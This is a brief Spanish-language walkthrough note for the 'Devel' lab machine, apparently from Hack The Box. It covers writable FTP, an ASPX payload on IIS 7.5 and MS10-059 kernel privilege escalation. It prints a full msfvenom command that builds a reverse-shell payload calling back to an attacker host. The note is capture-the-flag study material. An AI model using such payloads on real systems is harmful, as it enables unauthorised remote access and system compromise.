Devel

Resumen de la resolución

  • Máquina con servicio FTP expuesto con permisos de escritura

  • Creación de código malicioso .aspx con MSFVenom para ejecutarlo en un servidor web Microsoft IIS 7.5

  • Escalada de privilegios con Kernel Exploit MS10-059 (Chimichurri)

Habilidades adquiridas

  • Al subir un binario por FTP se debe usar el comando bin para que sea interpretado como tal

LogoGitHub - SecWiki/windows-kernel-exploits: windows-kernel-exploits Windows平台提权漏洞集合GitHub
Repositorio WIndows Kernel Exploits

Comandos y herramientas destacables

  • Búsqueda recursiva desde Windows cmd

where /r c:\ iisstart.htm

  • Reverse Shell aspx con MSFVenom

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f aspx > exploit.aspx

Walkthrough en YouTube:

Pendiente

AnteriorActiveSiguienteChatterbox

Última actualización